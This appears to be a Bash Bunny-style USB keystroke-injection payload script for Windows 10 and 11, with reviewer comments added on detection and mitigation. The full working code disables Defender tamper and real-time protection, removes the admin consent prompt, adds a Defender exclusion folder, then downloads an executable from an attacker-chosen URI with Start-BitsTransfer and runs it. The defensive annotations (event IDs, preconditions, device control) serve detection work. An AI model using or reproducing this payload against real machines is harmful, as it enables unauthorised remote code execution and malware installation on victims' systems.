KryptoKola d237d080e6
payload.txt (#567)
What the payload does:
#                   1) Disables Tamper Protection in Windows Defender.
#                   2) Disables UAC / Turns UAC off
#                   3) Creates Payload Directory in C:/ Drive
#                   4) Disables Real-Time Protection in Windows Defender.
#                   5) Adds the Payload Directory as an exclusion in Windows Defender
#                   6) Downloads Payload from Specified URI (Enter in Variable Below)
#                   7) Runs Payload on System
2022-12-16 12:59:18 -06:00


#!/bin/bash
#
# Title: Microsoft Windows Payload Injector
#
# Description:
# 1) Disables Tamper Protection in Windows Defender.
# 2) Disables UAC / Turns UAC off
# 3) Creates Payload Directory in C:/ Drive
# 4) Disables Real-Time Protection in Windows Defender.
# 5) Adds the Payload Directory as an exclusion in Windows Defender
# 6) Downloads Payload from Specified URI (Enter in Variable Below)
# 7) Runs Payload on System
#
# Author: KryptoKola
# Version: 1.0
# Category: Remote Access
# Target: Microsoft Windows 10 & 11
#
# NOTE(review): this appears to be a Hak5 Bash Bunny style HID payload, not a
# script the target executes. ATTACKMODE HID makes the device enumerate as a USB
# keyboard and every "Q ..." line is typed into whatever window has focus on the
# target; LED lines only drive the device's status LED. bash on the device does
# nothing beyond expanding ${PAYLOAD_DOWNLOAD_URI} and running Q/LED/ATTACKMODE,
# so the outcome depends entirely on the fixed Q DELAY timings and on the target's
# UI layout at the moment the keystrokes arrive.
#
# Defender summary (per-stage artefacts are noted inline below):
#   - the chain presumes physical USB access to an unlocked session of a local
#     admin; a locked screen or a standard-user session stops it by STAGE2.
#   - USB device control that blocks unrecognised HID keyboards, and Tamper
#     Protection enforced centrally (Intune / Defender for Endpoint) so the local
#     toggle is greyed out, each remove a precondition the later stages rely on.
LED SETUP
# From here on the device presents itself to the host as a keyboard.
ATTACKMODE HID
#Variables
# Expanded by bash on the device before the STAGE4 command line is typed, so the
# URI appears in clear text in the typed command, in PowerShell script block
# logging (event 4104) and in process command-line auditing on the target.
readonly PAYLOAD_DOWNLOAD_URI="ENTER PAYLOAD URI HERE"
#Disables Tamper Protection in Windows 10 & 11
# STAGE1 drives the Windows Security app by keyboard only: Win+S search, open
# "Virus & threat protection", TAB to the Tamper Protection toggle, SPACE to flip
# it, ALT+y for the resulting UAC consent prompt, then close the app. The TAB
# counts are tied to one specific page layout; any deviation puts the remaining
# keystrokes in the wrong control. Tamper Protection is what makes the
# Set-MpPreference changes in STAGE4 fail, which is why it is toggled first; when
# it is managed centrally the local toggle is disabled and this stage has no effect.
LED STAGE1
Q GUI s
Q STRING "Virus & threat protection"
Q ENTER
# Long fixed wait for the Windows Security app to open; slower hosts may not be
# ready, in which case every following keystroke is misdirected.
Q DELAY 10000
Q TAB
Q TAB
Q TAB
Q TAB
Q ENTER
Q DELAY 1000
Q TAB
Q TAB
Q TAB
Q TAB
Q SPACE
Q DELAY 1000
Q ALT y
Q DELAY 1000
Q ALT F4
Q FN ALT F4
#Starts Powershell in Admin mode
# STAGE2 opens the Run dialog (Win+R) and types a one-liner that spawns an
# elevated PowerShell via Start-Process -Verb runAs, then answers the UAC consent
# dialog with ALT+y. This relies on the logged-in user being a local admin with
# UAC set to "prompt for consent"; prompting for credentials on the secure desktop,
# or daily use of a standard-user account, stops the chain here. On the target it
# shows up as explorer.exe -> powershell.exe -> elevated powershell.exe with the
# full command line in process-creation auditing (Security 4688 / Sysmon event 1).
LED STAGE2
Q GUI r
Q DELAY 250
Q STRING powershell Start-Process powershell -Verb runAs
Q ENTER
Q DELAY 3000
Q ALT y
Q DELAY 5000
#Disables UAC, Creates Payload Directory, and moves to C:/ directory in powershell
# STAGE3, typed into the elevated PowerShell: change to C:\, create C:\Payloads,
# and set HKLM\...\Policies\System\ConsentPromptBehaviorAdmin to 0 ("elevate
# without prompting"). Note this changes the admin consent-prompt policy rather
# than turning UAC off as the header says. Registry value-set auditing (Security
# 4657 with a SACL on the key, or Sysmon event 13) captures the change.
LED STAGE3
Q STRING "cd C:/;mkdir Payloads;Set-ItemProperty -Path REGISTRY::HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System -Name ConsentPromptBehaviorAdmin -Value 0;"
Q ENTER
Q DELAY 1500
Q ALT y
Q DELAY 250
#Disables Real Time Protection, Makes an exclusion to the Payloads folder in Windows Defender, Navigates to the Payloads folder, then Downloads specified payload from URI.
# STAGE4, also typed into the elevated shell: turn off Defender real-time
# monitoring, add C:\Payloads as a Defender exclusion, and fetch the payload with
# BITS. Each step is logged on the target: Defender Operational log event 5001
# (real-time protection disabled) and 5007 (configuration change, here the new
# exclusion), plus a BITS-Client Operational log job entry for the transfer; the
# one-liner itself is recorded by script block logging (4104).
LED STAGE4
Q STRING "Set-MpPreference -DisableRealtimeMonitoring 1;Set-MpPreference -ExclusionPath "C:/Payloads";cd C:/Payloads;Start-BitsTransfer -Source ${PAYLOAD_DOWNLOAD_URI} -Destination ./payload.exe;"
Q ENTER
Q DELAY 2000
#Launches the Payload on the machine
# STAGE5 executes the downloaded binary from the excluded folder. Process
# creation of C:\Payloads\payload.exe with an elevated powershell.exe parent is
# the most direct detection point, as is any execution from a path that was
# added as a Defender exclusion moments earlier.
LED STAGE5
Q STRING ./payload.exe
Q ENTER
Q DELAY 250
#Clears the shell and exits out.
# CLEANUP only clears the visible console and closes the elevated shell; none of
# the registry, Defender or event-log artefacts above are reverted by it.
LED CLEANUP
Q STRING clear
Q ENTER
Q DELAY 250
Q STRING exit
Q ENTER
LED FINISH